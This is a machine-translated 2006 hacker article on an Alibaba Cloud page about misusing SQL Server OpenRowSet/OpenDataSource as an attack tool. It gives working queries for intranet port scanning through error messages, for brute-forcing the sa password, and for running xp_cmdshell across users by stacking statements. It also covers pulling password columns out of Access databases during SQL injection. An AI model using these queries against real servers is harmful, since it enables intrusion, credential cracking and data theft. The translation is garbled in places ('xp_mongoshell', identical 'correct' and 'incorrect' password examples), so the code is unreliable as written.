Other OpenRowSet/OpenDataSource skills

Last Update:2018-12-04 Source: Internet

Author: User

Tags ole

Developer on Alibaba Coud: Build your first app with APIs, SDKs, and tutorials on the Alibaba Cloud. Read more ＞

Other OpenRowSet/OpenDataSource skills

Author: superhei _ [at] _ ph4nt0m.org
Blog:Http://superhei.blogbus.com/
Team:Http://www.ph4nt0m.org
Data: 2006-04-16

Preface:
You should be familiar with the OpenRowSet/OpenDataSource application. CADT [1] is the OpenRowSet. In fact, we can use OpenRowSet/OpenDataSource

To do many things.

I. Reference to the function prototype:

OpenRowSet:Http://msdn2.microsoft.com/zh-cn/library/ms190312(SQL .90). aspx

OpenRowSet
({'Provider _ name', {'datasource '; 'user _ id'; 'Password'
| 'Provider _ string '}
, {[Catalog.] [schema.] Object
| 'Query'
}
| Bulk 'data _ file ',
{Formatfile = 'format _ file_path '[<bulk_options>]
| Single_blob | single_clob | single_nclob}
})

<Bulk_options >::=
[, CodePage = {'acp '| 'oem' | 'raw '| 'Code _ page'}]
[, Errorfile = 'file _ name']
[, Firstrow = first_row]
[, Lastrow = last_row]
[, Maxerrors = maximum_errors]
[, Rows_per_batch = rows_per_batch]

OpenDataSource:Http://msdn2.microsoft.com/zh-cn/library/ms179856(SQL .90). aspx

OpenDataSource (provider_name, init_string)

II. Specific Use
[The following uses OpenRowSet as an example]

A. Use the sqloledb interface:

Select * From OpenRowSet ('sqloledb', 'server = 127.0.0.1, 1433; uid = aaa; Pwd = aaa', 'select @ version ')

Provider_name: sqloledb
Datasource: Server = 127.0.0.1, 1433
User_id: uid = aaa
Password: Pwd = aaa
Query: Select @ version

1. Use the datasource parameter for port (Intranet) scanning:

A. Local Port Scan:
* Open the port [Yes]:
Select * From OpenRowSet ('sqloledb', 'server = 127.0.0.1, 1433; uid = superhei; Pwd = ', 'select @ version ')
Server: Message 18456, Level 14, status 1, Row 1
User 'superhei' Login Failed.
*. Open the port [No]:
Select * From OpenRowSet ('sqloledb', 'server = 127.0.0.1, 2433; uid = superhei; Pwd = ', 'select @ version ')
Server: Message 17, level 16, status 1, Row 1
SQL Server does not exist or Access denied.

B. Intranet Port Scan:
* Open the port [Yes]:
Select * From OpenRowSet ('sqloledb', 'server = 169.254.155.7, 1433; uid = superhei; Pwd = ', 'select @ version ')
Server: Message 18456, Level 14, status 1, Row 1
User 'superhei' Login Failed.
*. Open the port [No]:
Select * From OpenRowSet ('sqloledb', 'server = 169.254.155.8, 1433; uid = superhei; Pwd = ', 'select @ version ')
Server: Message 17, level 16, status 1, Row 1
SQL Server does not exist or Access denied.

2. Use user_id/password to guess the user password:
* The password is correct.
Select * From OpenRowSet ('sqloledb', 'server = 127.0.0.1, 1433; uid = sa; Pwd = 100', 'select @ version ')

Personal Edition on Windows NT 5.0 (build 2195: Service Pack 4)

* Incorrect password
Select * From OpenRowSet ('sqloledb', 'server = 127.0.0.1, 1433; uid = sa; Pwd = 100', 'select @ version ')
Server: Message 18456, Level 14, status 1, Row 1
User 'sa 'Login Failed.

3. Execute SQL statements across users

If the user permissions of the current web connection are too low, such as public, and the above method is improved to crack other DBO passwords of SA, we can execute SQL statements by injecting cross-user [permissions,

Let's test:

Select * From OpenRowSet ('sqloledb', 'server = 127.0.0.1, 1433; uid = sa; Pwd = 100', 'exec master. DBO. xp_mongoshell [dir] ')

Server: Message 7357, level 16, status 2, Row 1
Failed to process the object 'exec master. DBO. xp_cmdshell [dir] '. The ole db Provider 'sqlodb' indicates that this object does not contain any columns.

Dizzy ~~, Failed: no column. We can use multiple statements to break through:

Select * From OpenRowSet ('sqloledb', 'server = 127.0.0.1, 1433; uid = sa; Pwd = 100', 'select user; Exec master. DBO. xp_mongoshell

[Dir> C:/test.txt] ')

Return the result of select user. we can see that test.txt exists on the C drive. Exec master. DBO. xp_mongoshell [dir> C:/test.txt] is successfully executed.

B. Use of Microsoft OLE DB provider for jet and Other interfaces.

Select f_name, f_password from OpenRowSet ('Microsoft. Jet. oledb.4.0 ', 'd:/LSE/connections/Q. mdb'; 'admin'; '', admin)
[PS: MDB does not set the password as admin, And the password is blank]

Return the data in the database D:/LSE/connections/Q. mdb, table admin, column f_name, and f_password. In this way, we can improve SQL injection to obtain some sensitive data in MDB.

The preceding statement must have the SA permission. We can also combine some interface vulnerabilities, such as msjet40.dll overflow, to execute commands.

In addition, regwrite uses the sandbox together with select shell () for execution. And so on.

4. Use of bulk [a little... if you are interested, you can do it]

This article is an English version of an article which is originally in the Chinese language on aliyun.com and is provided for information purposes only. This website makes no representation or warranty of any kind, either expressed or implied, as to the accuracy, completeness ownership or reliability of the article or any translations thereof. If you have any concerns or complaints relating to the article, please send an email, providing a detailed description of the concern or complaint, to info-contact@alibabacloud.com. A staff member will contact you within 5 working days. Once verified, infringing content will be removed immediately.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

Get Started for Free

Sales Support

1 on 1 presale consultation

Chat Contact Sales
After-Sales Support

24/7 Technical Support 6 Free Tickets per Quarter Faster Response

Open a Ticket
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.

Learn More